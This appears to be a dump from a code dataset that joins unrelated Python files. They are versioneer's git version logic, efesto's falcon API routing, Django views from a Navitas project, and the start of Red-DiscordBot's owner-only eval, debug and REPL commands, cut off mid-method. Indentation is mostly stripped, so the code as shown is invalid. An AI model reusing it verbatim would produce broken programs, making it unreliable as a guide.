if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py has not already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there is not one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' does not start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' does not start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def do_vcs_install(manifest_in, versionfile_source, ipy):
"""Git-specific installation logic for Versioneer.
For Git, this means creating/changing .gitattributes to mark _version.py
for export-subst keyword substitution.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
files = [manifest_in, versionfile_source]
if ipy:
files.append(ipy)
try:
me = __file__
if me.endswith(".pyc") or me.endswith(".pyo"):
me = os.path.splitext(me)[0] + ".py"
versioneer_file = os.path.relpath(me)
except NameError:
versioneer_file = "versioneer.py"
files.append(versioneer_file)
present = False
try:
f = open(".gitattributes", "r")
for line in f.readlines():
if line.strip().startswith(versionfile_source):
if "export-subst" in line.strip().split()[1:]:
present = True
f.close()
except EnvironmentError:
pass
if not present:
f = open(".gitattributes", "a+")
f.write("%s export-subst\n" % versionfile_source)
f.close()
files.append(".gitattributes")
run_command(GITS, ["add", "--"] + files)
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir does not start with parentdir_prefix")
SHORT_VERSION_PY = """
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
%s
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
"""
def versions_from_file(filename):
"""Try to determine the version from _version.py if present."""
try:
with open(filename) as f:
contents = f.read()
except EnvironmentError:
raise NotThisMethod("unable to read _version.py")
mo = re.search(r"version_json = '''\n(.*)''' # END VERSION_JSON",
contents, re.M | re.S)
if not mo:
mo = re.search(r"version_json = '''\r\n(.*)''' # END VERSION_JSON",
contents, re.M | re.S)
if not mo:
raise NotThisMethod("no version_json in _version.py")
return json.loads(mo.group(1))
def write_to_version_file(filename, versions):
"""Write the given version number to the given _version.py file."""
os.unlink(filename)
contents = json.dumps(versions, sort_keys=True,
indent=1, separators=(",", ": "))
with open(filename, "w") as f:
f.write(SHORT_VERSION_PY % contents)
print("set %s to '%s'" % (filename, versions["version"]))
def plus_or_dot(pieces):
"""Return a + if we do not already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you should not be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
class VersioneerBadRootError(Exception):
"""The project root directory is unknown or missing key files."""
def get_versions(verbose=False):
"""Get the project version from whatever source is available.
Returns dict with two keys: 'version' and 'full'.
"""
if "versioneer" in sys.modules:
# see the discussion in cmdclass.py:get_cmdclass()
del sys.modules["versioneer"]
root = get_root()
cfg = get_config_from_root(root)
assert cfg.VCS is not None, "please set [versioneer]VCS= in setup.cfg"
handlers = HANDLERS.get(cfg.VCS)
assert handlers, "unrecognized VCS '%s'" % cfg.VCS
verbose = verbose or cfg.verbose
assert cfg.versionfile_source is not None, \
"please set versioneer.versionfile_source"
assert cfg.tag_prefix is not None, "please set versioneer.tag_prefix"
versionfile_abs = os.path.join(root, cfg.versionfile_source)
# extract version from first of: _version.py, VCS command (e.g. 'git
# describe'), parentdir. This is meant to work for developers using a
# source checkout, for users of a tarball created by 'setup.py sdist',
# and for users of a tarball/zipball created by 'git archive' or github's
# download-from-tag feature or the equivalent in other VCSes.
get_keywords_f = handlers.get("get_keywords")
from_keywords_f = handlers.get("keywords")
if get_keywords_f and from_keywords_f:
try:
keywords = get_keywords_f(versionfile_abs)
ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
if verbose:
print("got version from expanded keyword %s" % ver)
return ver
except NotThisMethod:
pass
try:
ver = versions_from_file(versionfile_abs)
if verbose:
print("got version from file %s %s" % (versionfile_abs, ver))
return ver
except NotThisMethod:
pass
from_vcs_f = handlers.get("pieces_from_vcs")
if from_vcs_f:
try:
pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
ver = render(pieces, cfg.style)
if verbose:
print("got version from VCS %s" % ver)
return ver
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
if verbose:
print("got version from parentdir %s" % ver)
return ver
except NotThisMethod:
pass
if verbose:
print("unable to compute version")
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None, "error": "unable to compute version",
"date": None}
def get_version():
"""Get the short version string for this project."""
return get_versions()["version"]
def get_cmdclass():
"""Get the custom setuptools/distutils subclasses used by Versioneer."""
if "versioneer" in sys.modules:
del sys.modules["versioneer"]
# this fixes the "python setup.py develop" case (also 'install' and
# 'easy_install .'), in which subdependencies of the main project are
# built (using setup.py bdist_egg) in the same python process. Assume
# a main project A and a dependency B, which use different versions
# of Versioneer. A's setup.py imports A's Versioneer, leaving it in
# sys.modules by the time B's setup.py is executed, causing B to run
# with the wrong versioneer. Setuptools wraps the sub-dep builds in a
    # sandbox that restores sys.modules to its pre-build state, so the
# parent is protected against the child's "import versioneer". By
# removing ourselves from sys.modules here, before the child build
# happens, we protect the child from the parent's versioneer too.
# Also see https://github.com/warner/python-versioneer/issues/52
cmds = {}
# we add "version" to both distutils and setuptools
from distutils.core import Command
class cmd_version(Command):
description = "report generated version string"
user_options = []
boolean_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
vers = get_versions(verbose=True)
print("Version: %s" % vers["version"])
print(" full-revisionid: %s" % vers.get("full-revisionid"))
print(" dirty: %s" % vers.get("dirty"))
print(" date: %s" % vers.get("date"))
if vers["error"]:
print(" error: %s" % vers["error"])
cmds["version"] = cmd_version
# we override "build_py" in both distutils and setuptools
#
# most invocation pathways end up running build_py:
# distutils/build -> build_py
# distutils/install -> distutils/build ->..
# setuptools/bdist_wheel -> distutils/install ->..
# setuptools/bdist_egg -> distutils/install_lib -> build_py
# setuptools/install -> bdist_egg ->..
# setuptools/develop -> ?
# pip install:
# copies source tree to a tempdir before running egg_info/etc
# if .git is not copied too, 'git describe' will fail
# then does setup.py bdist_wheel, or sometimes setup.py install
# setup.py egg_info -> ?
# we override different "build_py" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.build_py import build_py as _build_py
else:
from distutils.command.build_py import build_py as _build_py
class cmd_build_py(_build_py):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
_build_py.run(self)
# now locate _version.py in the new build/ directory and replace
# it with an updated value
if cfg.versionfile_build:
target_versionfile = os.path.join(self.build_lib,
cfg.versionfile_build)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
cmds["build_py"] = cmd_build_py
if "cx_Freeze" in sys.modules: # cx_freeze enabled?
from cx_Freeze.dist import build_exe as _build_exe
# nczeczulin reports that py2exe will not like the pep440-style string
# as FILEVERSION, but it can be used for PRODUCTVERSION, e.g.
# setup(console=[{
# "version": versioneer.get_version().split("+", 1)[0], # FILEVERSION
# "product_version": versioneer.get_version(),
# ...
class cmd_build_exe(_build_exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_build_exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
cmds["build_exe"] = cmd_build_exe
del cmds["build_py"]
if 'py2exe' in sys.modules: # py2exe enabled?
try:
from py2exe.distutils_buildexe import py2exe as _py2exe # py3
except ImportError:
from py2exe.build_exe import py2exe as _py2exe # py2
class cmd_py2exe(_py2exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_py2exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
cmds["py2exe"] = cmd_py2exe
# we override different "sdist" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.sdist import sdist as _sdist
else:
from distutils.command.sdist import sdist as _sdist
class cmd_sdist(_sdist):
def run(self):
versions = get_versions()
self._versioneer_generated_versions = versions
# unless we update this, the command will keep using the old
# version
self.distribution.metadata.version = versions["version"]
return _sdist.run(self)
def make_release_tree(self, base_dir, files):
root = get_root()
cfg = get_config_from_root(root)
_sdist.make_release_tree(self, base_dir, files)
# now locate _version.py in the new base_dir directory
# (remembering that it may be a hardlink) and replace it with an
# updated value
target_versionfile = os.path.join(base_dir, cfg.versionfile_source)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile,
self._versioneer_generated_versions)
cmds["sdist"] = cmd_sdist
return cmds
CONFIG_ERROR = """
setup.cfg is missing the necessary Versioneer configuration. You need
a section like:
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
You will also need to edit your setup.py to use the results:
import versioneer
setup(version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(), ...)
Please read the docstring in ./versioneer.py for configuration instructions,
edit setup.cfg, and re-run the installer or 'python versioneer.py setup'.
"""
SAMPLE_CONFIG = """
# See the docstring in versioneer.py for instructions. Note that you must
# re-run 'versioneer.py setup' after changing this section, and commit the
# resulting files.
[versioneer]
#VCS = git
#style = pep440
#versionfile_source =
#versionfile_build =
#tag_prefix =
#parentdir_prefix =
"""
INIT_PY_SNIPPET = """
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
"""
def do_setup():
"""Main VCS-independent setup function for installing Versioneer."""
root = get_root()
try:
cfg = get_config_from_root(root)
except (EnvironmentError, configparser.NoSectionError,
configparser.NoOptionError) as e:
if isinstance(e, (EnvironmentError, configparser.NoSectionError)):
print("Adding sample versioneer config to setup.cfg",
file=sys.stderr)
with open(os.path.join(root, "setup.cfg"), "a") as f:
f.write(SAMPLE_CONFIG)
print(CONFIG_ERROR, file=sys.stderr)
return 1
print(" creating %s" % cfg.versionfile_source)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG % {"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
ipy = os.path.join(os.path.dirname(cfg.versionfile_source),
"__init__.py")
if os.path.exists(ipy):
try:
with open(ipy, "r") as f:
old = f.read()
except EnvironmentError:
old = ""
if INIT_PY_SNIPPET not in old:
print(" appending to %s" % ipy)
with open(ipy, "a") as f:
f.write(INIT_PY_SNIPPET)
else:
print(" %s unmodified" % ipy)
else:
print(" %s does not exist, ok" % ipy)
ipy = None
# Make sure both the top-level "versioneer.py" and versionfile_source
# (PKG/_version.py, used by runtime code) are in MANIFEST.in, so
# they'll be copied into source distributions. Pip will not be able to
# install the package without this.
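    # For example (illustrative), after this step MANIFEST.in would contain
    # lines such as:
    #   include versioneer.py
    #   include src/myproject/_version.py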
manifest_in = os.path.join(root, "MANIFEST.in")
simple_includes = set()
try:
with open(manifest_in, "r") as f:
for line in f:
if line.startswith("include "):
for include in line.split()[1:]:
simple_includes.add(include)
except EnvironmentError:
pass
# That does not cover everything MANIFEST.in can do
# (http://docs.python.org/2/distutils/sourcedist.html#commands), so
# it might give some false negatives. Appending redundant 'include'
# lines is safe, though.
if "versioneer.py" not in simple_includes:
print(" appending 'versioneer.py' to MANIFEST.in")
with open(manifest_in, "a") as f:
f.write("include versioneer.py\n")
else:
print(" 'versioneer.py' already in MANIFEST.in")
if cfg.versionfile_source not in simple_includes:
print(" appending versionfile_source ('%s') to MANIFEST.in" %
cfg.versionfile_source)
with open(manifest_in, "a") as f:
f.write("include %s\n" % cfg.versionfile_source)
else:
print(" versionfile_source already in MANIFEST.in")
# Make VCS-specific changes. For git, this means creating/changing
# .gitattributes to mark _version.py for export-subst keyword
# substitution.
do_vcs_install(manifest_in, cfg.versionfile_source, ipy)
return 0
def scan_setup_py():
"""Validate the contents of setup.py against Versioneer's expectations."""
found = set()
setters = False
errors = 0
with open("setup.py", "r") as f:
for line in f.readlines():
if "import versioneer" in line:
found.add("import")
if "versioneer.get_cmdclass()" in line:
found.add("cmdclass")
if "versioneer.get_version()" in line:
found.add("get_version")
if "versioneer.VCS" in line:
setters = True
if "versioneer.versionfile_source" in line:
setters = True
if len(found) != 3:
print("")
print("Your setup.py appears to be missing some important items")
print("(but I might be wrong). Please make sure it has something")
print("roughly like the following:")
print("")
print(" import versioneer")
print(" setup( version=versioneer.get_version(),")
print(" cmdclass=versioneer.get_cmdclass(), ...)")
print("")
errors += 1
if setters:
print("You should remove lines like 'versioneer.VCS = ' and")
print("'versioneer.versionfile_source = ' . This configuration")
print("now lives in setup.cfg, and should be removed from setup.py")
print("")
errors += 1
return errors
if __name__ == "__main__":
cmd = sys.argv[1]
if cmd == "setup":
errors = do_setup()
errors += scan_setup_py()
if errors:
sys.exit(1)
| bsd-3-clause | 7,394,031,660,277,220,000 | 36.671789 | 79 | 0.613815 | false |
getefesto/efesto | efesto/Api.py | 1 | 1093 | # -*- coding: utf-8 -*-
from efesto.Generator import Generator
from efesto.handlers import Collections, Items
import falcon
class Api:
def __init__(self, **kwargs):
self.api = falcon.API(**kwargs)
@staticmethod
def collection(model):
return Collections(model)
@staticmethod
def item(model):
return Items(model)
def list_route(self, endpoint, model):
self.api.add_route(endpoint, self.collection(model))
def object_route(self, endpoint, model):
route = '{}/{}'.format(endpoint, '{id}')
self.api.add_route(route, self.item(model))
def add_endpoint(self, endpoint, model):
self.list_route(endpoint, model)
self.object_route(endpoint, model)
def dynamic_endpoints(self, types):
generator = Generator()
for dynamic_type in types:
model = generator.generate(dynamic_type)
self.add_endpoint('/{}'.format(dynamic_type.name), model)
def cherries(self):
"""
        This method is the cherry on the cake: it returns the configured falcon API instance.
"""
return self.api
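# Illustrative usage sketch (added for clarity, not part of the original module);
# the endpoint path and model name are hypothetical:
#
#     api = Api()
#     api.add_endpoint('/examples', ExampleModel)
#     application = api.cherries()  # the falcon API instance, a WSGI callable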
| gpl-3.0 | 8,956,973,960,251,535,000 | 25.02381 | 69 | 0.617566 | false |
andersonjonathan/Navitas | navitas/contents/views.py | 1 | 2048 | import json
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.utils.translation import check_for_language, activate
from contents.forms import ImageForm
from contents.models import TextContent, FrontPageImage
def landing(request):
return render(request, 'contents/landing.html', {"images": FrontPageImage.objects.all()})
def set_language(request):
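    # Added for clarity (not in the original): given e.g. ?lang=sv&next=/en/about/
    # (paths hypothetical), the current two-letter language prefix is stripped from
    # `next` and, when the requested language is valid, replaced with the new one,
    # redirecting to /sv/about/.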
next_page = request.GET.get('next', None)
lang_code = request.GET.get('lang', None)
if not next_page:
next_page = '/'
else:
next_page = next_page[3:]
if lang_code and check_for_language(lang_code):
activate(lang_code)
next_page = '/' + lang_code + next_page
response = HttpResponseRedirect(next_page)
return response
def text_content(request, url):
content = get_object_or_404(TextContent, url=url)
return render(request, 'contents/content.html', {'content': content})
@login_required
def administration(request):
return render(request, 'contents/administration.html', {'text_content': TextContent.objects.all()})
@login_required
def upload_image(request):
res = {'status': "Default error"}
if request.method == 'POST':
form = ImageForm(request.POST, request.FILES)
if form.is_valid():
ins = form.save()
ins.refresh_from_db()
res['status'] = "ok"
res['url'] = ins.get_absolute_url()
return HttpResponse(json.dumps(res))
@login_required
def model_form_upload(request):
if request.method == 'POST':
form = ImageForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return render(request, 'contents/landing.html', {"images": FrontPageImage.objects.all()})
else:
form = ImageForm()
return render(request, 'contents/model_form_upload.html', {
'form': form
}) | mit | -842,173,136,335,333,800 | 27.068493 | 103 | 0.668945 | false |
palmtree5/Red-DiscordBot | redbot/core/dev_commands.py | 2 | 12729 | import ast
import asyncio
import aiohttp
import inspect
import io
import textwrap
import traceback
import types
import re
from contextlib import redirect_stdout
from copy import copy
import discord
from . import checks, commands
from .commands import NoParseOptional as Optional
from .i18n import Translator, cog_i18n
from .utils.chat_formatting import pagify
from .utils.predicates import MessagePredicate
"""
Notice:
95% of the below code came from R.Danny which can be found here:
https://github.com/Rapptz/RoboDanny/blob/master/cogs/repl.py
"""
_ = Translator("Dev", __file__)
START_CODE_BLOCK_RE = re.compile(r"^((```py(thon)?)(?=\s)|(```))")
@cog_i18n(_)
class Dev(commands.Cog):
"""Various development focused utilities."""
async def red_delete_data_for_user(self, **kwargs):
"""
Because despite my best efforts to advise otherwise,
people use ``--dev`` in production
"""
return
def __init__(self):
super().__init__()
self._last_result = None
self.sessions = {}
self.env_extensions = {}
@staticmethod
def async_compile(source, filename, mode):
return compile(source, filename, mode, flags=ast.PyCF_ALLOW_TOP_LEVEL_AWAIT, optimize=0)
@staticmethod
async def maybe_await(coro):
for i in range(2):
if inspect.isawaitable(coro):
coro = await coro
else:
return coro
return coro
@staticmethod
def cleanup_code(content):
"""Automatically removes code blocks from the code."""
# remove ```py\n```
if content.startswith("```") and content.endswith("```"):
return START_CODE_BLOCK_RE.sub("", content)[:-3]
# remove `foo`
return content.strip("` \n")
@classmethod
def get_syntax_error(cls, e):
"""Format a syntax error to send to the user.
Returns a string representation of the error formatted as a codeblock.
"""
if e.text is None:
return cls.get_pages("{0.__class__.__name__}: {0}".format(e))
return cls.get_pages(
"{0.text}\n{1:>{0.offset}}\n{2}: {0}".format(e, "^", type(e).__name__)
)
@staticmethod
def get_pages(msg: str):
"""Pagify the given message for output to the user."""
return pagify(msg, delims=["\n", " "], priority=True, shorten_by=10)
@staticmethod
def sanitize_output(ctx: commands.Context, input_: str) -> str:
"""Hides the bot's token from a string."""
token = ctx.bot.http.token
return re.sub(re.escape(token), "[EXPUNGED]", input_, re.I)
def get_environment(self, ctx: commands.Context) -> dict:
env = {
"bot": ctx.bot,
"ctx": ctx,
"channel": ctx.channel,
"author": ctx.author,
"guild": ctx.guild,
"message": ctx.message,
"asyncio": asyncio,
"aiohttp": aiohttp,
"discord": discord,
"commands": commands,
"_": self._last_result,
"__name__": "__main__",
}
for name, value in self.env_extensions.items():
try:
env[name] = value(ctx)
except Exception as e:
traceback.clear_frames(e.__traceback__)
env[name] = e
return env
@commands.command()
@checks.is_owner()
async def debug(self, ctx, *, code):
"""Evaluate a statement of python code.
The bot will always respond with the return value of the code.
If the return value of the code is a coroutine, it will be awaited,
and the result of that will be the bot's response.
Note: Only one statement may be evaluated. Using certain restricted
keywords, e.g. yield, will result in a syntax error. For multiple
lines or asynchronous code, see [p]repl or [p]eval.
Environment Variables:
ctx - command invocation context
bot - bot object
channel - the current channel object
author - command author's member object
message - the command's message object
discord - discord.py library
commands - redbot.core.commands
_ - The result of the last dev command.
"""
env = self.get_environment(ctx)
code = self.cleanup_code(code)
try:
compiled = self.async_compile(code, "<string>", "eval")
result = await self.maybe_await(eval(compiled, env))
except SyntaxError as e:
await ctx.send_interactive(self.get_syntax_error(e), box_lang="py")
return
except Exception as e:
await ctx.send_interactive(
self.get_pages("{}: {!s}".format(type(e).__name__, e)), box_lang="py"
)
return
self._last_result = result
result = self.sanitize_output(ctx, str(result))
await ctx.send_interactive(self.get_pages(result), box_lang="py")
@commands.command(name="eval")
@checks.is_owner()
async def _eval(self, ctx, *, body: str):
"""Execute asynchronous code.
This command wraps code into the body of an async function and then
calls and awaits it. The bot will respond with anything printed to
stdout, as well as the return value of the function.
The code can be within a codeblock, inline code or neither, as long
as they are not mixed and they are formatted correctly.
Environment Variables:
ctx - command invocation context
bot - bot object
channel - the current channel object
author - command author's member object
message - the command's message object
discord - discord.py library
commands - redbot.core.commands
_ - The result of the last dev command.
"""
env = self.get_environment(ctx)
body = self.cleanup_code(body)
stdout = io.StringIO()
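        # Wrap the user-supplied body in an async function so that top-level
        # `await` and `return` work; exec-ing the wrapper defines `func` in `env`.
        # (Comment added for clarity, not in the original.)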
to_compile = "async def func():\n%s" % textwrap.indent(body, " ")
try:
compiled = self.async_compile(to_compile, "<string>", "exec")
exec(compiled, env)
except SyntaxError as e:
return await ctx.send_interactive(self.get_syntax_error(e), box_lang="py")
func = env["func"]
result = None
try:
with redirect_stdout(stdout):
result = await func()
except:
printed = "{}{}".format(stdout.getvalue(), traceback.format_exc())
else:
printed = stdout.getvalue()
await ctx.tick()
if result is not None:
self._last_result = result
msg = "{}{}".format(printed, result)
else:
msg = printed
msg = self.sanitize_output(ctx, msg)
await ctx.send_interactive(self.get_pages(msg), box_lang="py")
@commands.group(invoke_without_command=True)
@checks.is_owner()
async def repl(self, ctx):
"""Open an interactive REPL.
The REPL will only recognise code as messages which start with a
backtick. This includes codeblocks, and as such multiple lines can be
evaluated.
"""
if ctx.channel.id in self.sessions:
if self.sessions[ctx.channel.id]:
await ctx.send(
